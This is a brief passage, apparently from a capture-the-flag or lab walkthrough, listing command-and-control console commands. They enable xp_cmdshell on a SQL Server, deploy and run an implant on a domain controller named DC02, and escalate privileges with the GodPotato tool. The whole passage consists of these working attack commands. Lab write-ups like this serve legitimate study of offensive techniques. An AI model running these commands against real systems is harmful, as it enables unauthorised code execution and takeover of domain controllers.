mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC sp_configure 'show advanced options', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC xp_cmdshell 'whoami'"Initial foothold on DC02
mythical > cp c:\ProgramData\Google\Update.exe \\DC02.mythical-eu.vl\dev\update.exe
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "EXEC xp_cmdshell 'C:\dev\update.exe'"
Privilege escalation on DC02 via SeImpersonatePrivilege
mythical > cp c:\Temp\GodPotato-NET4.exe \\DC02.mythical-eu.vl\dev\GodPotato-NET4.exe
mythical > shell GodPotato-NET4.exe -cmd c:\dev\update.exe
Last updated